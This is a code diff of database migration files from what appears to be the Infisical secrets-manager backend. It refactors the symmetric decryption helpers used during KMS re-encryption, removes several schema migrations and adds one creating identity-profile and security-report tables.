// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
tag: el.inputTag,
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
ciphertext: el.inputCiphertext
})
: "";
const encryptedInput = projectKmsService.encryptor({

View File

@@ -1,11 +1,10 @@
import { Knex } from "knex";
import { inMemoryKeyStore } from "@app/keystore/memory";
import { crypto } from "@app/lib/crypto/cryptography";
import { infisicalSymmetricDecrypt } from "@app/lib/crypto/encryption";
import { selectAllTableCols } from "@app/lib/knex";
import { initLogger } from "@app/lib/logger";
import { KmsDataKey } from "@app/services/kms/kms-types";
import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
import { SecretKeyEncoding, TableName } from "../schemas";
import { getMigrationEnvConfig } from "./utils/env-config";
@@ -24,9 +23,7 @@ export async function up(knex: Knex): Promise<void> {
}
initLogger();
const superAdminDAL = superAdminDALFactory(knex);
const envConfig = await getMigrationEnvConfig(superAdminDAL);
const envConfig = getMigrationEnvConfig();
const keyStore = inMemoryKeyStore();
const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
const projectEncryptionRingBuffer =
@@ -56,23 +53,20 @@ export async function up(knex: Knex): Promise<void> {
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
el.encryptedDataTag && el.encryptedDataIV && el.encryptedData && el.keyEncoding
? crypto
.encryption()
.symmetric()
.decryptWithRootEncryptionKey({
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
keyEncoding: el.keyEncoding as SecretKeyEncoding,
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
iv: el.encryptedDataIV,
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
tag: el.encryptedDataTag,
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
ciphertext: el.encryptedData
})
? infisicalSymmetricDecrypt({
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
keyEncoding: el.keyEncoding as SecretKeyEncoding,
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
iv: el.encryptedDataIV,
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
tag: el.encryptedDataTag,
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
ciphertext: el.encryptedData
})
: "";
const encryptedRotationData = projectKmsService.encryptor({

View File

@@ -1,11 +1,10 @@
import { Knex } from "knex";
import { inMemoryKeyStore } from "@app/keystore/memory";
import { crypto, SymmetricKeySize } from "@app/lib/crypto/cryptography";
import { decryptSymmetric, infisicalSymmetricDecrypt } from "@app/lib/crypto/encryption";
import { selectAllTableCols } from "@app/lib/knex";
import { initLogger } from "@app/lib/logger";
import { KmsDataKey } from "@app/services/kms/kms-types";
import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
import { SecretKeyEncoding, TableName, TOrgBots } from "../schemas";
import { getMigrationEnvConfig } from "./utils/env-config";
@@ -55,9 +54,7 @@ const reencryptIdentityK8sAuth = async (knex: Knex) => {
}
initLogger();
const superAdminDAL = superAdminDALFactory(knex);
const envConfig = await getMigrationEnvConfig(superAdminDAL);
const envConfig = getMigrationEnvConfig();
const keyStore = inMemoryKeyStore();
const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
const orgEncryptionRingBuffer =
@@ -102,23 +99,19 @@ const reencryptIdentityK8sAuth = async (knex: Knex) => {
orgEncryptionRingBuffer.push(orgId, orgKmsService);
}
const key = crypto
.encryption()
.symmetric()
.decryptWithRootEncryptionKey({
ciphertext: encryptedSymmetricKey,
iv: symmetricKeyIV,
tag: symmetricKeyTag,
keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
});
const key = infisicalSymmetricDecrypt({
ciphertext: encryptedSymmetricKey,
iv: symmetricKeyIV,
tag: symmetricKeyTag,
keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
});
const decryptedTokenReviewerJwt =
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
el.encryptedTokenReviewerJwt && el.tokenReviewerJwtIV && el.tokenReviewerJwtTag
? crypto.encryption().symmetric().decrypt({
? decryptSymmetric({
key,
keySize: SymmetricKeySize.Bits256,
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
iv: el.tokenReviewerJwtIV,
@@ -135,9 +128,8 @@ const reencryptIdentityK8sAuth = async (knex: Knex) => {
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
el.encryptedCaCert && el.caCertIV && el.caCertTag
? crypto.encryption().symmetric().decrypt({
? decryptSymmetric({
key,
keySize: SymmetricKeySize.Bits256,
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
iv: el.caCertIV,

View File

@@ -1,11 +1,10 @@
import { Knex } from "knex";
import { inMemoryKeyStore } from "@app/keystore/memory";
import { crypto, SymmetricKeySize } from "@app/lib/crypto/cryptography";
import { decryptSymmetric, infisicalSymmetricDecrypt } from "@app/lib/crypto/encryption";
import { selectAllTableCols } from "@app/lib/knex";
import { initLogger } from "@app/lib/logger";
import { KmsDataKey } from "@app/services/kms/kms-types";
import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
import { SecretKeyEncoding, TableName, TOrgBots } from "../schemas";
import { getMigrationEnvConfig } from "./utils/env-config";
@@ -35,9 +34,7 @@ const reencryptIdentityOidcAuth = async (knex: Knex) => {
}
initLogger();
const superAdminDAL = superAdminDALFactory(knex);
const envConfig = await getMigrationEnvConfig(superAdminDAL);
const envConfig = getMigrationEnvConfig();
const keyStore = inMemoryKeyStore();
const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
const orgEncryptionRingBuffer =
@@ -74,24 +71,19 @@ const reencryptIdentityOidcAuth = async (knex: Knex) => {
);
orgEncryptionRingBuffer.push(orgId, orgKmsService);
}
const key = crypto
.encryption()
.symmetric()
.decryptWithRootEncryptionKey({
ciphertext: encryptedSymmetricKey,
iv: symmetricKeyIV,
tag: symmetricKeyTag,
keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
});
const key = infisicalSymmetricDecrypt({
ciphertext: encryptedSymmetricKey,
iv: symmetricKeyIV,
tag: symmetricKeyTag,
keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
});
const decryptedCertificate =
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
el.encryptedCaCert && el.caCertIV && el.caCertTag
? crypto.encryption().symmetric().decrypt({
? decryptSymmetric({
key,
keySize: SymmetricKeySize.Bits256,
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
iv: el.caCertIV,

View File

@@ -1,11 +1,10 @@
import { Knex } from "knex";
import { inMemoryKeyStore } from "@app/keystore/memory";
import { crypto, SymmetricKeySize } from "@app/lib/crypto/cryptography";
import { decryptSymmetric, infisicalSymmetricDecrypt } from "@app/lib/crypto/encryption";
import { selectAllTableCols } from "@app/lib/knex";
import { initLogger } from "@app/lib/logger";
import { KmsDataKey } from "@app/services/kms/kms-types";
import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
import { SecretKeyEncoding, TableName } from "../schemas";
import { getMigrationEnvConfig } from "./utils/env-config";
@@ -28,8 +27,7 @@ const reencryptSamlConfig = async (knex: Knex) => {
}
initLogger();
const superAdminDAL = superAdminDALFactory(knex);
const envConfig = await getMigrationEnvConfig(superAdminDAL);
const envConfig = getMigrationEnvConfig();
const keyStore = inMemoryKeyStore();
const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
const orgEncryptionRingBuffer =
@@ -60,24 +58,19 @@ const reencryptSamlConfig = async (knex: Knex) => {
);
orgEncryptionRingBuffer.push(el.orgId, orgKmsService);
}
const key = crypto
.encryption()
.symmetric()
.decryptWithRootEncryptionKey({
ciphertext: encryptedSymmetricKey,
iv: symmetricKeyIV,
tag: symmetricKeyTag,
keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
});
const key = infisicalSymmetricDecrypt({
ciphertext: encryptedSymmetricKey,
iv: symmetricKeyIV,
tag: symmetricKeyTag,
keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
});
const decryptedEntryPoint =
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
el.encryptedEntryPoint && el.entryPointIV && el.entryPointTag
? crypto.encryption().symmetric().decrypt({
? decryptSymmetric({
key,
keySize: SymmetricKeySize.Bits256,
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
iv: el.entryPointIV,
@@ -94,9 +87,8 @@ const reencryptSamlConfig = async (knex: Knex) => {
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
el.encryptedIssuer && el.issuerIV && el.issuerTag
? crypto.encryption().symmetric().decrypt({
? decryptSymmetric({
key,
keySize: SymmetricKeySize.Bits256,
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
iv: el.issuerIV,
@@ -113,9 +105,8 @@ const reencryptSamlConfig = async (knex: Knex) => {
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
el.encryptedCert && el.certIV && el.certTag
? crypto.encryption().symmetric().decrypt({
? decryptSymmetric({
key,
keySize: SymmetricKeySize.Bits256,
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
iv: el.certIV,
@@ -194,8 +185,7 @@ const reencryptLdapConfig = async (knex: Knex) => {
}
initLogger();
const superAdminDAL = superAdminDALFactory(knex);
const envConfig = await getMigrationEnvConfig(superAdminDAL);
const envConfig = getMigrationEnvConfig();
const keyStore = inMemoryKeyStore();
const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
const orgEncryptionRingBuffer =
@@ -226,24 +216,19 @@ const reencryptLdapConfig = async (knex: Knex) => {
);
orgEncryptionRingBuffer.push(el.orgId, orgKmsService);
}
const key = crypto
.encryption()
.symmetric()
.decryptWithRootEncryptionKey({
ciphertext: encryptedSymmetricKey,
iv: symmetricKeyIV,
tag: symmetricKeyTag,
keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
});
const key = infisicalSymmetricDecrypt({
ciphertext: encryptedSymmetricKey,
iv: symmetricKeyIV,
tag: symmetricKeyTag,
keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
});
const decryptedBindDN =
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
el.encryptedBindDN && el.bindDNIV && el.bindDNTag
? crypto.encryption().symmetric().decrypt({
? decryptSymmetric({
key,
keySize: SymmetricKeySize.Bits256,
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
iv: el.bindDNIV,
@@ -260,9 +245,8 @@ const reencryptLdapConfig = async (knex: Knex) => {
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
el.encryptedBindPass && el.bindPassIV && el.bindPassTag
? crypto.encryption().symmetric().decrypt({
? decryptSymmetric({
key,
keySize: SymmetricKeySize.Bits256,
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
iv: el.bindPassIV,
@@ -279,9 +263,8 @@ const reencryptLdapConfig = async (knex: Knex) => {
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
el.encryptedCACert && el.caCertIV && el.caCertTag
? crypto.encryption().symmetric().decrypt({
? decryptSymmetric({
key,
keySize: SymmetricKeySize.Bits256,
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
iv: el.caCertIV,
@@ -354,8 +337,7 @@ const reencryptOidcConfig = async (knex: Knex) => {
}
initLogger();
const superAdminDAL = superAdminDALFactory(knex);
const envConfig = await getMigrationEnvConfig(superAdminDAL);
const envConfig = getMigrationEnvConfig();
const keyStore = inMemoryKeyStore();
const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
const orgEncryptionRingBuffer =
@@ -386,24 +368,19 @@ const reencryptOidcConfig = async (knex: Knex) => {
);
orgEncryptionRingBuffer.push(el.orgId, orgKmsService);
}
const key = crypto
.encryption()
.symmetric()
.decryptWithRootEncryptionKey({
ciphertext: encryptedSymmetricKey,
iv: symmetricKeyIV,
tag: symmetricKeyTag,
keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
});
const key = infisicalSymmetricDecrypt({
ciphertext: encryptedSymmetricKey,
iv: symmetricKeyIV,
tag: symmetricKeyTag,
keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
});
const decryptedClientId =
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
el.encryptedClientId && el.clientIdIV && el.clientIdTag
? crypto.encryption().symmetric().decrypt({
? decryptSymmetric({
key,
keySize: SymmetricKeySize.Bits256,
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
iv: el.clientIdIV,
@@ -420,9 +397,8 @@ const reencryptOidcConfig = async (knex: Knex) => {
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
el.encryptedClientSecret && el.clientSecretIV && el.clientSecretTag
? crypto.encryption().symmetric().decrypt({
? decryptSymmetric({
key,
keySize: SymmetricKeySize.Bits256,
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
iv: el.clientSecretIV,

View File

@@ -1,115 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
import { createOnUpdateTrigger, dropOnUpdateTrigger } from "../utils";
export async function up(knex: Knex): Promise<void> {
if (!(await knex.schema.hasTable(TableName.OrgGatewayConfig))) {
await knex.schema.createTable(TableName.OrgGatewayConfig, (t) => {
t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
t.string("rootCaKeyAlgorithm").notNullable();
t.datetime("rootCaIssuedAt").notNullable();
t.datetime("rootCaExpiration").notNullable();
t.string("rootCaSerialNumber").notNullable();
t.binary("encryptedRootCaCertificate").notNullable();
t.binary("encryptedRootCaPrivateKey").notNullable();
t.datetime("clientCaIssuedAt").notNullable();
t.datetime("clientCaExpiration").notNullable();
t.string("clientCaSerialNumber");
t.binary("encryptedClientCaCertificate").notNullable();
t.binary("encryptedClientCaPrivateKey").notNullable();
t.string("clientCertSerialNumber").notNullable();
t.string("clientCertKeyAlgorithm").notNullable();
t.datetime("clientCertIssuedAt").notNullable();
t.datetime("clientCertExpiration").notNullable();
t.binary("encryptedClientCertificate").notNullable();
t.binary("encryptedClientPrivateKey").notNullable();
t.datetime("gatewayCaIssuedAt").notNullable();
t.datetime("gatewayCaExpiration").notNullable();
t.string("gatewayCaSerialNumber").notNullable();
t.binary("encryptedGatewayCaCertificate").notNullable();
t.binary("encryptedGatewayCaPrivateKey").notNullable();
t.uuid("orgId").notNullable();
t.foreign("orgId").references("id").inTable(TableName.Organization).onDelete("CASCADE");
t.unique("orgId");
t.timestamps(true, true, true);
});
await createOnUpdateTrigger(knex, TableName.OrgGatewayConfig);
}
if (!(await knex.schema.hasTable(TableName.Gateway))) {
await knex.schema.createTable(TableName.Gateway, (t) => {
t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
t.string("name").notNullable();
t.string("serialNumber").notNullable();
t.string("keyAlgorithm").notNullable();
t.datetime("issuedAt").notNullable();
t.datetime("expiration").notNullable();
t.datetime("heartbeat");
t.binary("relayAddress").notNullable();
t.uuid("orgGatewayRootCaId").notNullable();
t.foreign("orgGatewayRootCaId").references("id").inTable(TableName.OrgGatewayConfig).onDelete("CASCADE");
t.uuid("identityId").notNullable();
t.foreign("identityId").references("id").inTable(TableName.Identity).onDelete("CASCADE");
t.timestamps(true, true, true);
});
await createOnUpdateTrigger(knex, TableName.Gateway);
}
if (!(await knex.schema.hasTable(TableName.ProjectGateway))) {
await knex.schema.createTable(TableName.ProjectGateway, (t) => {
t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
t.string("projectId").notNullable();
t.foreign("projectId").references("id").inTable(TableName.Project).onDelete("CASCADE");
t.uuid("gatewayId").notNullable();
t.foreign("gatewayId").references("id").inTable(TableName.Gateway).onDelete("CASCADE");
t.timestamps(true, true, true);
});
await createOnUpdateTrigger(knex, TableName.ProjectGateway);
}
if (await knex.schema.hasTable(TableName.DynamicSecret)) {
const doesGatewayColExist = await knex.schema.hasColumn(TableName.DynamicSecret, "projectGatewayId");
await knex.schema.alterTable(TableName.DynamicSecret, (t) => {
// not setting a foreign constraint so that cascade effects are not triggered
if (!doesGatewayColExist) {
t.uuid("projectGatewayId");
t.foreign("projectGatewayId").references("id").inTable(TableName.ProjectGateway);
}
});
}
}
export async function down(knex: Knex): Promise<void> {
if (await knex.schema.hasTable(TableName.DynamicSecret)) {
const doesGatewayColExist = await knex.schema.hasColumn(TableName.DynamicSecret, "projectGatewayId");
await knex.schema.alterTable(TableName.DynamicSecret, (t) => {
if (doesGatewayColExist) t.dropColumn("projectGatewayId");
});
}
await knex.schema.dropTableIfExists(TableName.ProjectGateway);
await dropOnUpdateTrigger(knex, TableName.ProjectGateway);
await knex.schema.dropTableIfExists(TableName.Gateway);
await dropOnUpdateTrigger(knex, TableName.Gateway);
await knex.schema.dropTableIfExists(TableName.OrgGatewayConfig);
await dropOnUpdateTrigger(knex, TableName.OrgGatewayConfig);
}

View File

@@ -0,0 +1,53 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
import { createOnUpdateTrigger } from "../utils";
export async function up(knex: Knex): Promise<void> {
if (!(await knex.schema.hasTable(TableName.IdentityProfile))) {
await knex.schema.createTable(TableName.IdentityProfile, (t) => {
t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
t.uuid("userId");
t.foreign("userId").references("id").inTable(TableName.Users).onDelete("CASCADE");
t.uuid("identityId");
t.foreign("identityId").references("id").inTable(TableName.Identity).onDelete("CASCADE");
t.text("temporalProfile").notNullable(); // access pattern or frequency
t.text("scopeProfile").notNullable(); // scope of usage - are they accessing development environment secrets. which paths? are they doing mainly admin work?
t.text("usageProfile").notNullable(); // method of usage
t.uuid("orgId").notNullable();
t.foreign("orgId").references("id").inTable(TableName.Organization).onDelete("CASCADE");
t.timestamps(true, true, true);
});
await createOnUpdateTrigger(knex, TableName.IdentityProfile);
}
if (!(await knex.schema.hasTable(TableName.AutomatedSecurityReports))) {
await knex.schema.createTable(TableName.AutomatedSecurityReports, (t) => {
t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
t.uuid("profileId").notNullable();
t.foreign("profileId").references("id").inTable(TableName.IdentityProfile).onDelete("CASCADE");
t.jsonb("event").notNullable();
t.string("remarks").notNullable();
t.string("severity").notNullable();
t.string("status").notNullable();
t.timestamps(true, true, true);
});
await createOnUpdateTrigger(knex, TableName.AutomatedSecurityReports);
}
}
export async function down(knex: Knex): Promise<void> {
await knex.schema.dropTableIfExists(TableName.IdentityProfile);
await knex.schema.dropTableIfExists(TableName.AutomatedSecurityReports);
}

View File

@@ -1,25 +0,0 @@
import { Knex } from "knex";
import { SecretSharingType } from "@app/services/secret-sharing/secret-sharing-types";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
const hasSharingTypeColumn = await knex.schema.hasColumn(TableName.SecretSharing, "type");
await knex.schema.alterTable(TableName.SecretSharing, (table) => {
if (!hasSharingTypeColumn) {
table.string("type", 32).defaultTo(SecretSharingType.Share).notNullable();
}
});
}
export async function down(knex: Knex): Promise<void> {
const hasSharingTypeColumn = await knex.schema.hasColumn(TableName.SecretSharing, "type");
await knex.schema.alterTable(TableName.SecretSharing, (table) => {
if (hasSharingTypeColumn) {
table.dropColumn("type");
}
});
}

View File

@@ -1,31 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
const hasAuthConsentContentCol = await knex.schema.hasColumn(TableName.SuperAdmin, "authConsentContent");
const hasPageFrameContentCol = await knex.schema.hasColumn(TableName.SuperAdmin, "pageFrameContent");
if (await knex.schema.hasTable(TableName.SuperAdmin)) {
await knex.schema.alterTable(TableName.SuperAdmin, (t) => {
if (!hasAuthConsentContentCol) {
t.text("authConsentContent");
}
if (!hasPageFrameContentCol) {
t.text("pageFrameContent");
}
});
}
}
export async function down(knex: Knex): Promise<void> {
const hasAuthConsentContentCol = await knex.schema.hasColumn(TableName.SuperAdmin, "authConsentContent");
const hasPageFrameContentCol = await knex.schema.hasColumn(TableName.SuperAdmin, "pageFrameContent");
await knex.schema.alterTable(TableName.SuperAdmin, (t) => {
if (hasAuthConsentContentCol) {
t.dropColumn("authConsentContent");
}
if (hasPageFrameContentCol) {
t.dropColumn("pageFrameContent");
}
});
}

View File

@@ -1,35 +0,0 @@
import { Knex } from "knex";
import { TableName } from "@app/db/schemas";
export async function up(knex: Knex): Promise<void> {
for await (const tableName of [
TableName.SecretV2,
TableName.SecretVersionV2,
TableName.SecretApprovalRequestSecretV2
]) {
const hasReminderNoteCol = await knex.schema.hasColumn(tableName, "reminderNote");
if (hasReminderNoteCol) {
await knex.schema.alterTable(tableName, (t) => {
t.string("reminderNote", 1024).alter();
});
}
}
}
export async function down(knex: Knex): Promise<void> {
for await (const tableName of [
TableName.SecretV2,
TableName.SecretVersionV2,
TableName.SecretApprovalRequestSecretV2
]) {
const hasReminderNoteCol = await knex.schema.hasColumn(tableName, "reminderNote");
if (hasReminderNoteCol) {
await knex.schema.alterTable(tableName, (t) => {
t.string("reminderNote").alter();
});
}
}
}

View File

@@ -1,23 +0,0 @@
import { Knex } from "knex";
import { TableName } from "@app/db/schemas";
export async function up(knex: Knex): Promise<void> {
const hasProjectDescription = await knex.schema.hasColumn(TableName.SecretFolder, "description");
if (!hasProjectDescription) {
await knex.schema.alterTable(TableName.SecretFolder, (t) => {
t.string("description");
});
}
}
export async function down(knex: Knex): Promise<void> {
const hasProjectDescription = await knex.schema.hasColumn(TableName.SecretFolder, "description");
if (hasProjectDescription) {
await knex.schema.alterTable(TableName.SecretFolder, (t) => {
t.dropColumn("description");
});
}
}

View File

@@ -1,19 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
if (!(await knex.schema.hasColumn(TableName.SecretApprovalRequestReviewer, "comment"))) {
await knex.schema.alterTable(TableName.SecretApprovalRequestReviewer, (t) => {
t.string("comment");
});
}
}
export async function down(knex: Knex): Promise<void> {
if (await knex.schema.hasColumn(TableName.SecretApprovalRequestReviewer, "comment")) {
await knex.schema.alterTable(TableName.SecretApprovalRequestReviewer, (t) => {
t.dropColumn("comment");
});
}
}

View File

@@ -1,45 +0,0 @@
import { Knex } from "knex";
import { TableName } from "@app/db/schemas";
export async function up(knex: Knex): Promise<void> {
if (await knex.schema.hasTable(TableName.SecretVersionV2)) {
const hasSecretVersionV2UserActorId = await knex.schema.hasColumn(TableName.SecretVersionV2, "userActorId");
const hasSecretVersionV2IdentityActorId = await knex.schema.hasColumn(TableName.SecretVersionV2, "identityActorId");
const hasSecretVersionV2ActorType = await knex.schema.hasColumn(TableName.SecretVersionV2, "actorType");
await knex.schema.alterTable(TableName.SecretVersionV2, (t) => {
if (!hasSecretVersionV2UserActorId) {
t.uuid("userActorId");
t.foreign("userActorId").references("id").inTable(TableName.Users);
}
if (!hasSecretVersionV2IdentityActorId) {
t.uuid("identityActorId");
t.foreign("identityActorId").references("id").inTable(TableName.Identity);
}
if (!hasSecretVersionV2ActorType) {
t.string("actorType");
}
});
}
}
export async function down(knex: Knex): Promise<void> {
if (await knex.schema.hasTable(TableName.SecretVersionV2)) {
const hasSecretVersionV2UserActorId = await knex.schema.hasColumn(TableName.SecretVersionV2, "userActorId");
const hasSecretVersionV2IdentityActorId = await knex.schema.hasColumn(TableName.SecretVersionV2, "identityActorId");
const hasSecretVersionV2ActorType = await knex.schema.hasColumn(TableName.SecretVersionV2, "actorType");
await knex.schema.alterTable(TableName.SecretVersionV2, (t) => {
if (hasSecretVersionV2UserActorId) {
t.dropColumn("userActorId");
}
if (hasSecretVersionV2IdentityActorId) {
t.dropColumn("identityActorId");
}
if (hasSecretVersionV2ActorType) {
t.dropColumn("actorType");
}
});
}
}

View File

@@ -1,32 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
if (await knex.schema.hasTable(TableName.Organization)) {
const hasSecretShareToAnyoneCol = await knex.schema.hasColumn(
TableName.Organization,
"allowSecretSharingOutsideOrganization"
);
if (!hasSecretShareToAnyoneCol) {
await knex.schema.alterTable(TableName.Organization, (t) => {
t.boolean("allowSecretSharingOutsideOrganization").defaultTo(true);
});
}
}
}
export async function down(knex: Knex): Promise<void> {
if (await knex.schema.hasTable(TableName.Organization)) {
const hasSecretShareToAnyoneCol = await knex.schema.hasColumn(
TableName.Organization,
"allowSecretSharingOutsideOrganization"
);
if (hasSecretShareToAnyoneCol) {
await knex.schema.alterTable(TableName.Organization, (t) => {
t.dropColumn("allowSecretSharingOutsideOrganization");
});
}
}
}

View File

@@ -1,31 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
if (!(await knex.schema.hasColumn(TableName.Organization, "shouldUseNewPrivilegeSystem"))) {
await knex.schema.alterTable(TableName.Organization, (t) => {
t.boolean("shouldUseNewPrivilegeSystem");
t.string("privilegeUpgradeInitiatedByUsername");
t.dateTime("privilegeUpgradeInitiatedAt");
});
await knex(TableName.Organization).update({
shouldUseNewPrivilegeSystem: false
});
await knex.schema.alterTable(TableName.Organization, (t) => {
t.boolean("shouldUseNewPrivilegeSystem").defaultTo(true).notNullable().alter();
});
}
}
export async function down(knex: Knex): Promise<void> {
if (await knex.schema.hasColumn(TableName.Organization, "shouldUseNewPrivilegeSystem")) {
await knex.schema.alterTable(TableName.Organization, (t) => {
t.dropColumn("shouldUseNewPrivilegeSystem");
t.dropColumn("privilegeUpgradeInitiatedByUsername");
t.dropColumn("privilegeUpgradeInitiatedAt");
});
}
}

View File

@@ -1,21 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
const hasMappingField = await knex.schema.hasColumn(TableName.IdentityOidcAuth, "claimMetadataMapping");
if (!hasMappingField) {
await knex.schema.alterTable(TableName.IdentityOidcAuth, (t) => {
t.jsonb("claimMetadataMapping");
});
}
}
export async function down(knex: Knex): Promise<void> {
const hasMappingField = await knex.schema.hasColumn(TableName.IdentityOidcAuth, "claimMetadataMapping");
if (hasMappingField) {
await knex.schema.alterTable(TableName.IdentityOidcAuth, (t) => {
t.dropColumn("claimMetadataMapping");
});
}
}

View File

@@ -1,19 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas/models";
export async function up(knex: Knex): Promise<void> {
if (!(await knex.schema.hasColumn(TableName.SuperAdmin, "adminIdentityIds"))) {
await knex.schema.alterTable(TableName.SuperAdmin, (t) => {
t.specificType("adminIdentityIds", "text[]");
});
}
}
export async function down(knex: Knex): Promise<void> {
if (await knex.schema.hasColumn(TableName.SuperAdmin, "adminIdentityIds")) {
await knex.schema.alterTable(TableName.SuperAdmin, (t) => {
t.dropColumn("adminIdentityIds");
});
}
}

View File

@@ -1,23 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
const doesParentColumExist = await knex.schema.hasColumn(TableName.SecretFolder, "parentId");
const doesNameColumnExist = await knex.schema.hasColumn(TableName.SecretFolder, "name");
if (doesParentColumExist && doesNameColumnExist) {
await knex.schema.alterTable(TableName.SecretFolder, (t) => {
t.index(["parentId", "name"]);
});
}
}
export async function down(knex: Knex): Promise<void> {
const doesParentColumExist = await knex.schema.hasColumn(TableName.SecretFolder, "parentId");
const doesNameColumnExist = await knex.schema.hasColumn(TableName.SecretFolder, "name");
if (doesParentColumExist && doesNameColumnExist) {
await knex.schema.alterTable(TableName.SecretFolder, (t) => {
t.dropIndex(["parentId", "name"]);
});
}
}

View File

@@ -1,19 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
const hasReviewerJwtCol = await knex.schema.hasColumn(
TableName.IdentityKubernetesAuth,
"encryptedKubernetesTokenReviewerJwt"
);
if (hasReviewerJwtCol) {
await knex.schema.alterTable(TableName.IdentityKubernetesAuth, (t) => {
t.binary("encryptedKubernetesTokenReviewerJwt").nullable().alter();
});
}
}
export async function down(): Promise<void> {
// we can't make it back to non nullable, it will fail
}

View File

